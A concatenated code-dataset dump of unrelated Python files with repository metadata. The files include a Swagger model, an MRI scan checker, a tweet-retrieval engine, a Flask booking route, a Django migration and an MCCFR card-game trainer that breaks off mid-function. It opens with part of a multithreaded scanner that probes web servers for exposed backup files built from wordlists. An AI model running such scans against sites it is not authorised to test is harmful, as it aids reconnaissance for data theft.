                        continue
                    for filename in sorted(context.filenames_cache.items(), key=lambda item:item[1], reverse=True):
                        # '?' in the backup pattern is replaced by the filename.
                        path = "{}{}".format(foldername[0], backup[0].replace("?", filename[0]))
                        u = "{}{}".format(url, path)
                        task = {
                            "url":u,
                            "timeout": self.timeout,
                            "retry":4,
                            "foldername": foldername[0],
                            "filename":filename[0],
                            "backup": backup[0],
                        }
                        if not context.CTRL_C_FLAG:
                            self.Q.put(task)
                        # Ctrl-C unwinds each nested loop in turn.
                        if context.CTRL_C_FLAG: break
                    if context.CTRL_C_FLAG: break
                if context.CTRL_C_FLAG: break
        # Tells consumers that no further tasks will be produced.
        context.FINISH_FLAG = True
class Consumer(threading.Thread):
    """Daemon worker that drains scan tasks from the queue and runs check()
    on each until the queue is empty and the producer has finished."""
    def __init__(self, Q):
        threading.Thread.__init__(self)
        self.daemon = True
        self.Q = Q
    def run(self):
        while True:
            # Stop only when the producer is done AND nothing is queued.
            if self.Q.qsize() == 0 and context.FINISH_FLAG:
                break
            task = self.Q.get()
            try:
                check(task["url"], task["foldername"], task["filename"], task["backup"], task["timeout"])
            except Exception as e:
                # retry may cause dead lock, so disabled
                # if task["retry"] > 0:
                #     task["retry"] -= 1
                #     self.Q.put(task)
                #     print("{}, eescheduling task: {}".format(repr(e), task))
                pass
            finally:
                # Mark this task as done, whether an exception happened or not
                self.Q.task_done()
def start(urls, foldernames_file, filenames_file, backups_file, threads_number, timeout):
    """Launch one Producer and `threads_number` Consumers over a bounded
    queue, then block until the producer has enqueued everything.

    The queue is capped at 2x the worker count so the producer cannot
    race far ahead of the consumers.  Consumers are daemon threads and
    are not joined here.
    """
    Q = queue.Queue(maxsize=threads_number * 2)
    producer = Producer(Q, urls, open(foldernames_file), open(filenames_file), open(backups_file), timeout)
    producer.start()
    for i in range(threads_number):
        consumer = Consumer(Q)
        consumer.start()
    producer.join()
"lanvnal@foxmail.com"
] | lanvnal@foxmail.com |
c1396ab21dabc56b8319ae076980db2b18e388c6 | e2e7b6ae6f8897a75aaa960ed36bd90aa0743710 | /swagger_client/models/post_deployment.py | 2e5931f02a8d25c5931c6afa88ad097e5ca01832 | [
"Apache-2.0"
] | permissive | radon-h2020/radon-ctt-cli | 36912822bc8d76d52b00ea657ed01b8bfcc5056f | 3120b748c73e99d81d0cac5037e393229577d640 | refs/heads/master | 2023-08-19T10:54:01.517243 | 2021-09-15T15:38:51 | 2021-09-15T15:38:51 | 299,571,330 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,461 | py | # coding: utf-8
"""
RADON CTT Server API
This is API of the RADON Continuous Testing Tool (CTT) Server: <a href=\"https://github.com/radon-h2020/radon-ctt\">https://github.com/radon-h2020/radon-ctt<a/> # noqa: E501
OpenAPI spec version: 1.0.0-oas3
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
class POSTDeployment(object):
    """Request body model for creating a deployment; carries the UUID of the
    test artifact to deploy.

    NOTE: This class is auto generated by the swagger code generator program.
    Do not edit the class manually.
    """
    """
    Attributes:
      swagger_types (dict): The key is attribute name
                            and the value is attribute type.
      attribute_map (dict): The key is attribute name
                            and the value is json key in definition.
    """
    swagger_types = {
        'testartifact_uuid': 'str'
    }
    attribute_map = {
        'testartifact_uuid': 'testartifact_uuid'
    }
    def __init__(self, testartifact_uuid=None): # noqa: E501
        """POSTDeployment - a model defined in Swagger""" # noqa: E501
        self._testartifact_uuid = None
        self.discriminator = None
        # Assigning through the property enforces the not-None validation.
        self.testartifact_uuid = testartifact_uuid
    @property
    def testartifact_uuid(self):
        """Gets the testartifact_uuid of this POSTDeployment. # noqa: E501
        :return: The testartifact_uuid of this POSTDeployment. # noqa: E501
        :rtype: str
        """
        return self._testartifact_uuid
    @testartifact_uuid.setter
    def testartifact_uuid(self, testartifact_uuid):
        """Sets the testartifact_uuid of this POSTDeployment.
        :param testartifact_uuid: The testartifact_uuid of this POSTDeployment. # noqa: E501
        :type: str
        :raises ValueError: if testartifact_uuid is None (required field)
        """
        if testartifact_uuid is None:
            raise ValueError("Invalid value for `testartifact_uuid`, must not be `None`") # noqa: E501
        self._testartifact_uuid = testartifact_uuid
    def to_dict(self):
        """Returns the model properties as a dict"""
        result = {}
        for attr, _ in six.iteritems(self.swagger_types):
            value = getattr(self, attr)
            if isinstance(value, list):
                result[attr] = list(map(
                    lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
                    value
                ))
            elif hasattr(value, "to_dict"):
                result[attr] = value.to_dict()
            elif isinstance(value, dict):
                result[attr] = dict(map(
                    lambda item: (item[0], item[1].to_dict())
                    if hasattr(item[1], "to_dict") else item,
                    value.items()
                ))
            else:
                result[attr] = value
        if issubclass(POSTDeployment, dict):
            for key, value in self.items():
                result[key] = value
        return result
    def to_str(self):
        """Returns the string representation of the model"""
        return pprint.pformat(self.to_dict())
    def __repr__(self):
        """For `print` and `pprint`"""
        return self.to_str()
    def __eq__(self, other):
        """Returns true if both objects are equal"""
        if not isinstance(other, POSTDeployment):
            return False
        return self.__dict__ == other.__dict__
    def __ne__(self, other):
        """Returns true if both objects are not equal"""
        return not self == other
| [
"duellmann@iste.uni-stuttgart.de"
] | duellmann@iste.uni-stuttgart.de |
1d8bc9d7b9f1f8b71aaa271d97fd4d185b45f925 | 8bb086072e203a802bb2e8a34ca611a7daaa3ce2 | /subject_selection/select_3T_subjs_with_short_scans.py | 05a709a416819ee2033cf26a9d12cca22a2ea8b7 | [] | no_license | Washington-University/HCPpipelinesXnatPbsJobs | b4826af8f35561be56538b45eef138df51ff6490 | 9658c6dd487064cc6184c819911fe1fdf1b7aca9 | refs/heads/master | 2021-06-28T11:40:53.092452 | 2020-11-13T18:29:52 | 2020-11-13T18:29:52 | 154,562,056 | 0 | 1 | null | 2019-05-06T15:13:57 | 2018-10-24T20:03:47 | Shell | UTF-8 | Python | false | false | 2,579 | py | #!/usr/bin/env python3
# import of built-in modules
import os
import sys
import subprocess
# import of third party modules
pass
# import of local modules
import hcp.hcp3t.archive as hcp3t_archive
import hcp.hcp3t.subject as hcp3t_subject
# authorship information
__author__ = "Timothy B. Brown"
__copyright__ = "Copyright 2016, The Human Connectome Project"
__maintainer__ = "Timothy B. Brown"
def _inform(msg):
"""Inform the user by writing out a message that is prefixed by the file name.
:param msg: Message to output
:type msg: str
"""
#print(os.path.basename(__file__) + ": " + msg)
print(msg)
def get_volume_count(file_name):
    """Return the actual number of volumes (NIfTI dim4) in a scan file by
    shelling out to FSL's `fslinfo` and parsing its first dim4 line.

    Raises subprocess.CalledProcessError if the pipeline exits non-zero.
    NOTE(review): file_name is interpolated into a shell=True command
    string; safe only for trusted archive paths.
    """
    cmd = 'fslinfo ' + file_name
    cmd += " | grep dim4 | head -1 | tr -s ' ' | cut -d ' ' -f 2"
    completed_process = subprocess.run(cmd, shell=True, check=True, stdout=subprocess.PIPE, universal_newlines=True)
    volume_count = int(completed_process.stdout)
    return volume_count
def get_expected_volume_count(file_name):
    """Parse the expected volume count out of a diffusion scan file name.

    Names look like <subject>_<session>_DWI_dir<NN>_<pedir+suffix>; the
    number embedded after 'dir' in the fourth field is the expected
    volume count.  Raises ValueError if the name does not have exactly
    five underscore-separated fields or the count is not an integer.
    """
    base_name = os.path.basename(file_name)
    _subject, _session, _dwi, dir_token, _pe_and_suffix = base_name.split('_')
    # Drop the leading 'dir' (three characters) to expose the number.
    return int(dir_token[3:])
def main():
    """Report every 3T diffusion scan whose actual volume count (from
    fslinfo) differs from the count encoded in its file name, across the
    HCP_500 and HCP_900 projects."""
    archive = hcp3t_archive.Hcp3T_Archive()
    project_names = ['HCP_500', 'HCP_900']
    for project_name in project_names:
        subject_ids = archive.available_subject_ids(project_name)
        for subject_id in subject_ids:
            subject_info = hcp3t_subject.Hcp3TSubjectInfo(project_name, subject_id)
            available_diffusion_scan_fullpaths = archive.available_diffusion_scan_fullpaths(subject_info)
            for diffusion_scan in available_diffusion_scan_fullpaths:
                #_inform("")
                volume_count = get_volume_count(diffusion_scan)
                #_inform("diffusion_scan: " + diffusion_scan + " volume_count: " + str(volume_count))
                expected_volume_count = get_expected_volume_count(diffusion_scan)
                #_inform("diffusion_scan: " + diffusion_scan + " expected_volume_count: " + str(expected_volume_count))
                # Only mismatches (i.e. short/incomplete scans) are reported.
                if volume_count != expected_volume_count:
                    _inform("diffusion_scan: " + os.path.basename(diffusion_scan) +
                            " has expected volume count: " + str(expected_volume_count) +
                            " and actual volume count: " + str(volume_count))
if __name__ == "__main__":
main()
| [
"junilc@wustl.edu"
] | junilc@wustl.edu |
797a8815744350425e025a5f0309849676b9691c | e27333261b8e579564016c71d2061cc33972a8b8 | /.history/api/IR_engine_20210728213929.py | ddcc939eb070ba750cc5357a2d6a5aa401fe3e9a | [] | no_license | Dustyik/NewsTweet_InformationRetrieval | 882e63dd20bc9101cbf48afa6c3302febf1989b1 | d9a6d92b51c288f5bcd21ea1cc54772910fa58f7 | refs/heads/master | 2023-07-01T09:12:53.215563 | 2021-08-12T08:28:33 | 2021-08-12T08:28:33 | 382,780,359 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,136 | py | import pandas as pd
import numpy as np
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.metrics.pairwise import cosine_similarity
from sklearn.metrics.pairwise import euclidean_distances
from nltk.stem import PorterStemmer
from nltk.tokenize import word_tokenize
from IPython.display import display
'''
Functions to write:
1. tf-idf with cosine sim/Euclidean distance
- represent terms in each document with its tf-idf weights,
2. VSM with cosine sim/Euclidean distance
3. BIM
4. BM25
5. BERT
Test Titles:
f7ca322d-c3e8-40d2-841f-9d7250ac72ca Worcester breakfast club for veterans gives hunger its marching orders
609772bc-0672-4db5-8516-4c025cfd54ca Jumpshot Gives Marketers Renewed Visibility Into Paid and Organic Keywords With Launch of Jumpshot Elite
1aa9d1b0-e6ba-4a48-ad0c-66552d896aac The Return Of The Nike Air Max Sensation Has 80’s Babies Hyped!
719699f9-47be-4bc7-969b-b53a881c95ae This New Dating App Will Ruin Your Internet Game
Test Titles Stemmed:
worcest breakfast club for veteran give hunger it march order
jumpshot give market renew visibl into paid and organ keyword with launch of jumpshot elit
the return of the nike air max sensat ha s babi hype
thi new date app will ruin your internet game
'''
# Absolute (Windows) paths to the pre-stemmed article titles and the scraped tweets.
titles_file_path = r"D:\Desktop\IR_term_8\IR-tweets---disaster-\article_titles_stemmed.csv"
tweets_file_path = r"D:\Desktop\IR_term_8\IR-tweets---disaster-\dataset_scrapped.csv"
# Short model code -> human-readable name of each supported retrieval model.
SEARCH_MODELS = {
    "tfcs": "Tf-idf w Cosine Sim",
    "tfed": "Tf-idf w Euclidean Dist"
}
def returnTweetsBasedOnSearchModel(article_id, searchModel):
    """Dispatch a tweet search for ``article_id`` using ``searchModel``.

    NOTE(review): still a stub -- it always returns None.
    """
    return
class DataProcessor:
    """Loads the article-title and tweet CSVs and drops rows with missing
    values.

    The titles file is already tokenized/stemmed offline, so no PorterStemmer
    pass is performed at load time (the old in-process tokenize/stem helpers
    were removed for that reason).
    """

    def __init__(self):
        self.titles_data = pd.read_csv(titles_file_path).dropna()
        self.tweets_data = pd.read_csv(tweets_file_path).dropna()
        print ("Data Processor up and ready...")
class CosineSimilarity:
    """Ranks tweets against an article title by cosine similarity of their
    tf-idf (or term-count) vectors.

    NOTE(review): work-in-progress snapshot. ``get_result`` and ``query``
    reference attributes that are never set on this class (``self.matrix``,
    ``self.data``, ``self.documents``) -- they appear copied from
    ``EuclideanDistance`` and not yet adapted, so they cannot run as written.
    """
    def __init__(self, titles, tweets, type='tfidf'):
        self.titles = titles #contains titles data
        self.tweets = tweets #contains tweets data
        # Vectorizer instance: 'tfidf' -> TfidfVectorizer, 'dt' -> CountVectorizer.
        self.vectorizer = self.change_matrix_type(type)
    def get_result(self, return_size):
        """Fill ``self.result`` with the ``return_size`` tweets most similar
        to the query (assumed to be row 0 of ``self.matrix``)."""
        cos_sim = cosine_similarity(self.matrix, self.matrix)
        # Highest similarity first; the [1:...] slice skips the query itself.
        top_ind = np.flip(np.argsort(cos_sim[0]))[1:return_size+1]
        top_id = [list(self.matrix.index)[i] for i in top_ind]
        # print(top_10_ind ,top_10_id)
        self.result = []
        for i in top_id:
            filt = self.data[self.data.document==i]
            for ind, r in filt.iterrows():
                rel = r['rel']
                text = r['text']
                related = r['topic']
                # score: 1 = relevant hit, -1 = known non-relevant, 0 = unrelated article.
                score = 0
                if related==self.query_id and rel>0:
                    score = 1
                if related==self.query_id and rel==0:
                    score = -1
                self.result.append({'tweet_id':i, 'text': text, 'related_article':related,'score': score})
    def query(self, query_id, query_text, return_size=40):
        """Vectorize ``query_text`` together with the tweet corpus.

        NOTE(review): the matrix/result-building steps are still commented
        out, so this currently returns None.
        """
        self.query_id = query_id
        term_doc = self.vectorizer.fit_transform([query_text]+list(self.data.tweets))
        #ind = ['query'] + list(self.documents)
        #self.matrix = pd.DataFrame(term_doc.toarray(), columns=self.tweets.get_feature_names(), index=ind)
        #self.get_result(return_size)
        #return pd.DataFrame(self.result)
    def change_matrix_type(self, type):
        """Return the vectorizer matching ``type``; prints a warning (and
        implicitly returns None) for unknown types."""
        if type == 'tfidf':
            return TfidfVectorizer()
        elif type == 'dt':
            return CountVectorizer() #transforms the entire word matrix into a set of vectors
        else:
            print('Type is invalid')
    def get_matrix(self):
        return self.matrix
class EuclideanDistance:
    """Ranks tweets against a query string by Euclidean distance between
    their tf-idf (or term-count) vectors.

    ``data`` is expected to be a DataFrame with columns ``document`` (tweet
    id), ``clean_text`` (pre-stemmed text), ``rel``, ``text`` and ``topic``.
    """
    def __init__(self, data, type='tfidf'):
        self.data = data
        self.change_matrix_type(type)  # sets self.vec
        self.matrix = None  # term-document DataFrame, built by query()
    def get_result(self, return_size):
        """Fill ``self.result`` with the ``return_size`` closest tweets to
        the query (row 0 of ``self.matrix``)."""
        euclidean = euclidean_distances(self.matrix.values[1:], [self.matrix.values[0]])
        # Smallest distance first.
        top_ind = np.argsort(euclidean.T[0])[:return_size]
        # Distance row i corresponds to matrix row i + 1 (row 0 is the query),
        # so shift by one when mapping back to document ids.  The original
        # indexed with i, which returned 'query' itself for i == 0 and the
        # wrong document for every other position.
        top_id = [list(self.matrix.index)[i + 1] for i in top_ind]
        self.result = []
        for doc_id in top_id:
            filt = self.data[self.data.document == doc_id]
            for ind, r in filt.iterrows():
                rel = r['rel']
                text = r['text']
                related = r['topic']
                # score: 1 = relevant hit, -1 = known non-relevant, 0 = unrelated article.
                score = 0
                if related == self.query_id and rel > 0:
                    score = 1
                if related == self.query_id and rel == 0:
                    score = -1
                self.result.append({'tweet_id': doc_id, 'text': text, 'related_article': related, 'score': score})
    def query(self, query_id, query_text, return_size=10):
        """Vectorize ``query_text`` together with the tweet corpus, rank the
        tweets, and return the results as a DataFrame."""
        self.query_id = query_id
        term_doc = self.vec.fit_transform([query_text] + list(self.data.clean_text))
        ind = ['query'] + list(self.data.document)
        self.matrix = pd.DataFrame(term_doc.toarray(), columns=self.vec.get_feature_names(), index=ind)
        self.get_result(return_size)
        return pd.DataFrame(self.result)
    def change_matrix_type(self, type):
        """Set ``self.vec`` for ``type``; prints a warning (leaving any
        previous vectorizer in place) for unknown types."""
        if type == 'tfidf':
            self.vec = TfidfVectorizer()
        elif type == 'dt':
            self.vec = CountVectorizer()
        else:
            print('Type is invalid')
    def get_matrix(self):
        return self.matrix
dataProcessor = DataProcessor()
tweets = dataProcessor.tweets_data
titles = dataProcessor.titles_data
#display(tweets.head())
#display(titles.head())

# Smoke-test query: a known article id/title from the corpus.
sample_query_id = "f7ca322d-c3e8-40d2-841f-9d7250ac72ca"
sample_query_text = "Worcester breakfast club for veterans gives hunger its marching orders"

# The instance must NOT be named `cosine_similarity`: that would shadow
# sklearn's cosine_similarity function imported above, which
# CosineSimilarity.get_result calls internally (the shadowed name would then
# resolve to a non-callable instance).
cosine_model = CosineSimilarity(titles = titles, tweets = tweets)
cosine_model.vectorizer.fit_transform([sample_query_text])
print (cosine_model.vectorizer.get_feature_names())
#cosine_model.query(sample_query_id, sample_query_text)
| [
"chiayik_tan@mymail.sutd.edu.sg"
] | chiayik_tan@mymail.sutd.edu.sg |
d1520e9ff57b17017f0d8fbb25972e618c4716d7 | 294b75c805c5528fd6c6ff3d0d820afcafcff1bb | /Py_File/OS_Demo.py | df4ae6f8b49d06f28197d4ce57391a0dff094c5f | [] | no_license | kishansinghverma/C_Python | 7b679730c522c2f566a27540491912670eb0ffae | a96408f6a15e267f716a431d836f704eba9c13dc | refs/heads/master | 2020-06-15T12:29:10.750073 | 2019-12-24T15:51:19 | 2019-12-24T15:51:19 | 195,279,682 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 918 | py | import os
import time
# Mirror device state between remote.txt (source of truth) and local.txt,
# announcing changes on stdout.  State line format is
# "<fan>/<bulb>/<temperature>", e.g. "1.0/0.0/23.5".
#
# The original opened file handles without ever closing them: `f1.close`
# (missing parentheses) was a no-op attribute access, so a handle leaked on
# every one-second iteration.  `with` blocks close deterministically.
with open('local.txt', 'r') as f:
    current = list(map(float, f.read().strip().split('/')))

while True:
    with open('remote.txt', 'r') as f:
        rmt = list(map(float, f.read().strip().split('/')))
    if current[0] != rmt[0]:
        current[0] = rmt[0]
        if current[0] == 1:
            print('Fan Is Turned On!!')
        else:
            print('Fan Is Turned Off')
    if current[1] != rmt[1]:
        current[1] = rmt[1]
        if current[1] == 1:
            print('Bulb Is Turned On!!')
        else:
            print('Bulb Is Turned Off')
    if current[2] != rmt[2]:
        current[2] = rmt[2]
        print('Temp changed to: ', current[2])
    state_str = str(current[0]) + '/' + str(current[1]) + '/' + str(current[2])
    # Rewrite local.txt only when it is out of date.
    with open('local.txt', 'r') as f:
        on_disk = f.read()
    if on_disk != state_str:
        with open('local.txt', 'w') as f:
            f.write(state_str)
    time.sleep(1)
| [
"kishansinghverma@gmail.com"
] | kishansinghverma@gmail.com |
beb5f16630c055d23a39b70cb7f9dc6234831038 | c3b3b20b0a6d1a22857011b3d93e9090f270b536 | /service/routes/bookinghistory.py | 248752e92fc2b51d6714c6408cf1a298f46316e0 | [] | no_license | mindmedia/thecage-booking-backend-admin | ea105b61801a299ab1fe568ebcf2299157bb3b7a | a0169aaa7e5a42d6b6a9a245a5393fa3712e3d65 | refs/heads/master | 2022-04-12T04:22:58.450042 | 2020-02-28T15:47:25 | 2020-02-28T15:47:25 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,359 | py | from service.models import (
PurchaseLog,
PurchaseItem,
Pitch,
Product,
Field,
purchase_log_schema,
purchase_logs_schema,
purchase_log2_schema,
purchase_log2s_schema,
purchase_item_schema,
purchase_items_schema,
)
from flask import request, jsonify
from service import app
from datetime import datetime
from service import db
@app.route("/bookinghistory/<Id>", methods=["GET"])
def get_bookinghistory(Id):
    """Return the booking history for customer ``Id`` as JSON.

    Each entry is a serialized PurchaseLog (newest first) with a ``details``
    list of its serialized PurchaseItems, where pitch/product ids are replaced
    by their display names and the field name is added.

    NOTE(review): the inner dedup via ``purchaseitem_logids`` and the reuse of
    ``results_purchase_item`` mean every item of the *current* log's query is
    appended to the log entry being built -- confirm items cannot leak across
    logs if a query ever returns items from a different purchase_log_id.
    """
    current_purchase_log_id = -1
    purchaselog_ids = []      # ids of all of this customer's purchase logs
    purchaseitem_logids = []  # log ids already emitted (dedup guard)
    return_list = []
    # All purchase logs for this customer, newest first.
    purchase_log = (
        PurchaseLog.query.order_by(PurchaseLog.timestamp.desc())
        .filter_by(customer_id=Id)
        .all()
    )
    # NOTE(review): this dump is discarded -- it is recomputed per-log below.
    results_purchase_log = purchase_log2s_schema.dump(purchase_log)
    for result in purchase_log:
        purchaselog_ids.append(result.id)
    for log_id in purchaselog_ids:
        # Items belonging to this purchase log.
        purchase_item = (
            PurchaseItem.query.order_by(PurchaseItem.id.desc())
            .filter_by(purchase_log_id=log_id)
            # .filter(PurchaseItem.end_time > timestamp_now)
            .all()
        )
        results_purchase_item = purchase_items_schema.dump(purchase_item)
        for result in purchase_item:
            current_purchase_log_id = result.purchase_log_id
            if current_purchase_log_id not in purchaseitem_logids:
                # Re-fetch and serialize just this log so we can attach details.
                purchase_log = (
                    PurchaseLog.query.order_by(PurchaseLog.timestamp.desc())
                    .filter_by(customer_id=Id, id=current_purchase_log_id)
                    .all()
                )
                results_purchase_log = purchase_log2s_schema.dump(purchase_log)
                for log in results_purchase_log:
                    log.setdefault('details', [])
                    for i in results_purchase_item:
                        # Replace foreign-key ids with human-readable names.
                        pitch = Pitch.query.get(i['pitch_id'])
                        i['pitch_id'] = pitch.name
                        field = Field.query.get(i['field_id'])
                        i['field_name'] = field.name
                        product = Product.query.get(i['product_id'])
                        i['product_id'] = product.name
                        log['details'].append(i)
                    return_list.append(log)
                purchaseitem_logids.append(result.purchase_log_id)
    return jsonify(return_list)
| [
"XINGHAN.17@ichat.sp.edu.eg"
] | XINGHAN.17@ichat.sp.edu.eg |
47853c7c8e53ba4da18af09b6ac41b9c19b4f302 | 579385cc730ddcdd4b96d616c92caace15ac3d58 | /article/migrations/0018_auto_20170715_1051.py | 92429e1f3a578d1fab4b3d49561c8364c4a52406 | [] | no_license | exctac/vedansha.com | f852892fc36ae1b0086b2e836335c8ad6dded962 | 994a116d177192cf4d473c57332df1c6429e97b8 | refs/heads/master | 2020-07-09T18:58:54.171045 | 2018-02-04T21:58:19 | 2018-02-04T21:58:19 | 94,260,387 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,438 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11 on 2017-07-15 10:51
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated (Django 1.11): adds meta_title / meta_keywords /
    meta_description SEO fields to both Article and CategoryArticle.
    Generated migrations should not be edited by hand."""
    dependencies = [
        ('article', '0017_auto_20170715_0828'),
    ]
    operations = [
        migrations.AddField(
            model_name='article',
            name='meta_description',
            field=models.TextField(blank=True, verbose_name='Description'),
        ),
        migrations.AddField(
            model_name='article',
            name='meta_keywords',
            field=models.TextField(blank=True, verbose_name='Keywords'),
        ),
        migrations.AddField(
            model_name='article',
            name='meta_title',
            field=models.CharField(blank=True, max_length=255, verbose_name='Title'),
        ),
        migrations.AddField(
            model_name='categoryarticle',
            name='meta_description',
            field=models.TextField(blank=True, verbose_name='Description'),
        ),
        migrations.AddField(
            model_name='categoryarticle',
            name='meta_keywords',
            field=models.TextField(blank=True, verbose_name='Keywords'),
        ),
        migrations.AddField(
            model_name='categoryarticle',
            name='meta_title',
            field=models.CharField(blank=True, max_length=255, verbose_name='Title'),
        ),
    ]
| [
"exctac@yandex.ru"
] | exctac@yandex.ru |
3a04c2dd37578c83c5d70a4f932d23003925d731 | e9165ab1ae366130e313a9e748499a672e60fa31 | /setup.py | 7b5446a0eedc212adc3730d566e3c7bd26edbef3 | [
"MIT"
] | permissive | ciaron/stroppy | dfa97320332a0f99aacb0130594322c2c8d989ea | 081f14d50917bd7669b6554719791ceee538b96e | refs/heads/master | 2020-08-27T06:49:39.974647 | 2020-05-25T11:27:04 | 2020-05-25T11:27:04 | 217,275,130 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 688 | py | import setuptools
# Read the long description from the README.  Pass encoding explicitly: the
# original relied on the platform's default locale encoding, which breaks on
# systems where it is not UTF-8 if the README contains non-ASCII characters.
with open("README.md", "r", encoding="utf-8") as fh:
    long_description = fh.read()

setuptools.setup(
    name="stroppy-ciaron",
    version="0.0.1",
    author="Ciaron Linstead",
    author_email="c@ciaron.net",
    description="A static site generator for image galleries",
    long_description=long_description,
    long_description_content_type="text/markdown",
    url="https://github.com/ciaron/stroppy",
    packages=setuptools.find_packages(),
    classifiers=[
        "Programming Language :: Python :: 3",
        "License :: OSI Approved :: MIT License",
        "Operating System :: OS Independent",
    ],
    python_requires='>=3.6',
)
| [
"ciaron.linstead@gmail.com"
] | ciaron.linstead@gmail.com |
acc6e458d0eed26bbf21d9f29e8da48301241569 | 995447d49ea0b6f78ea70fac64959bf39f28556a | /datasets/__init__.py | e6230fde23e7922291a414c79e408227b603e894 | [
"MIT"
] | permissive | hhjung1202/DAtoN | ffcfe389292f8f3429ffc6b04d016bdf40506ee5 | 9d1beff544e695caa3149d6304415889e091cafd | refs/heads/master | 2020-05-18T07:51:43.489041 | 2019-05-03T03:11:44 | 2019-05-03T03:11:44 | 184,278,450 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 126 | py | from .mnist import get_mnist
from .usps import get_usps
from .svhn import get_svhn

# __all__ entries must be *strings* naming the public attributes; listing the
# function objects themselves makes `from datasets import *` raise TypeError.
__all__ = ("get_usps", "get_mnist", "get_svhn")
| [
"hhjung1202@naver.com"
] | hhjung1202@naver.com |
8906dc16d16c453861174bea5e4c2e7b79fdd5f7 | 2730d3aedc279f4cafed721cceacc6afe1f7d18d | /zjh/mccfr_zjh.py | 937a01350490f6bfd1a0ab3ed2b7e58dfbcc9ede | [] | no_license | AIMan-Zzx/zhajinhua | 9e2db235f045b49cd5a72b28a0c8f9a74e8e7982 | 17fa23afc97ad154b48972af9bd206a0c8df87ca | refs/heads/main | 2023-04-20T17:09:28.344371 | 2021-05-06T17:23:56 | 2021-05-06T17:23:56 | 364,983,662 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,173 | py | import numpy as np
import random
from itertools import permutations
from tqdm import tqdm
from typing import Dict, List, Union
import multiprocessing as mp
from collections import defaultdict
from node import MNode as Node
from state import State,Pair
import json
import sys
import os
# mccfr recurses once per action down the game tree; raise the limit well
# above CPython's default so deep games don't hit RecursionError.
sys.setrecursionlimit(1000000)
# regret_minimum = -300000
regret_minimum = -100  # actions whose regret sum is at or below this may be pruned
prune_threshold = 200  # iteration after which pruning kicks in (with probability 0.95)
def new_game(num_players):
    """Create a freshly dealt game: build a State for ``num_players`` seats,
    deal the cards (licensing) and display every pair (showAllPair)."""
    dealt = State(num_players)
    dealt.licensing()
    dealt.showAllPair()
    return dealt
def sub_train(t, state, node_map, locks={}, alpha=1):
    """Run one MCCFR traversal of ``state`` for every seat.

    Once iteration ``t`` exceeds ``prune_threshold``, each traversal uses
    regret-based pruning with probability 0.95 (a 5% chance keeps exploring
    every action).
    """
    for seat in range(state.num_players):
        use_prune = t > prune_threshold and np.random.rand() >= .05
        mccfr(seat, state, node_map, locks, alpha=alpha, prune=use_prune)
def train(iterations, num_players, node_map, locks={}):
    """Run ``iterations`` rounds of MCCFR self-play.

    Each round deals a fresh game and traverses it once per seat; after
    ``prune_threshold`` iterations, 95% of traversals use regret-based
    pruning.
    """
    for t in tqdm(range(1, iterations + 1), desc='Training'):
        state = new_game(num_players)
        for seat in range(num_players):
            use_prune = t > prune_threshold and np.random.rand() >= .05
            mccfr(seat, state, node_map, locks, prune=use_prune)
def mccfr(traverser, state, node_map,locks = {},alpha=1, prune=False):#locks: Dict[str, mp.synchronize.Lock] = {}, prune=False):
    """One external-sampling MCCFR traversal of ``state`` for ``traverser``.

    Returns a numpy array of per-player utilities for this sampled subtree.
    Regrets are accumulated (scaled by ``alpha``) only at ``traverser``'s own
    decision nodes; opponents' actions are sampled from their current
    strategy.  With ``prune=True``, actions whose accumulated regret is at or
    below ``regret_minimum`` are skipped and receive no regret update this
    pass.  ``locks["regret"]`` (if supplied) guards ``node_map`` updates.
    """
    turn = state.turn
    num_players = state.num_players
    player_not_in_hand = not state._liveState[traverser]
    if state.terminal:
        # Game over: exact utilities straight from the state.
        utility = state.utility()
        return utility
    elif player_not_in_hand:
        # Traverser has folded: further actions can't change its utility, so
        # return each player's current payoff without recursing.
        payoffs = [0 for _ in range(num_players)]
        for index,player in enumerate(state._players):
            islive = state._liveState[index]
            player = state._players[index]
            # NOTE(review): live players are scored 0 here while folded
            # players get payoff() - 1 -- confirm the extra -1 (ante?) is
            # intended.
            payoffs[index] = 0 if islive else player.payoff() - 1
        return np.array(payoffs)
    elif turn == traverser:
        # Traverser's decision node: explore actions and accumulate regret.
        info_set = state.info_set()
        valid_actions = state.valid_actions()
        # Fresh Node if this info set is unseen; stored back after the update.
        node = node_map[state.turn].get(info_set, Node(valid_actions))
        strategy = node.strategy()
        node_util = np.zeros(len(node_map))
        util = {action: 0 for action in valid_actions}
        explored = set(valid_actions)  # actions that will receive a regret update
        for action in valid_actions:
            if prune is True and node.regret_sum[action] <= regret_minimum:
                # if node.regret_sum[action] < 0:
                explored.remove(action)
            else:
                if action not in strategy:
                    explored.remove(action)
                    continue
                new_state = state.take(action,deep=True)
                returned = mccfr(traverser, new_state, node_map,
                                 locks,alpha,prune=prune)
                util[action] = returned[turn]
                # Expected value under the current strategy.
                node_util += returned * strategy[action]
        if locks:
            locks["regret"].acquire()
        for action in explored:
            # Counterfactual regret: action value minus node expected value.
            regret = util[action] - node_util[turn]
            node.regret_sum[action] += regret * alpha
            node_map[state.turn][info_set] = node
        if locks:
            locks["regret"].release()
        return node_util
    else:
        # Opponent node: sample a single action from its current strategy.
        info_set = state.info_set()
        valid_actions = state.valid_actions()
        node = node_map[state.turn].get(info_set, Node(valid_actions))
        strategy = node.strategy()
        actions = list(strategy.keys())
        prob = list(strategy.values())
        random_action = random.choices(actions, weights=prob)[0]
        new_state = state.take(random_action,deep=True)
        return mccfr(traverser, new_state, node_map, locks,alpha,prune=prune)
def serialise(node_map, save_path, name="single", locks={}):
    """Persist the regret sums in ``node_map`` to ``<save_path>/<name>_node_map.json``.

    If the file already exists, regrets for info sets present in both the file
    and ``node_map`` are summed; info sets only in ``node_map`` are written
    as-is.  Info sets that exist only in the file are dropped for that player
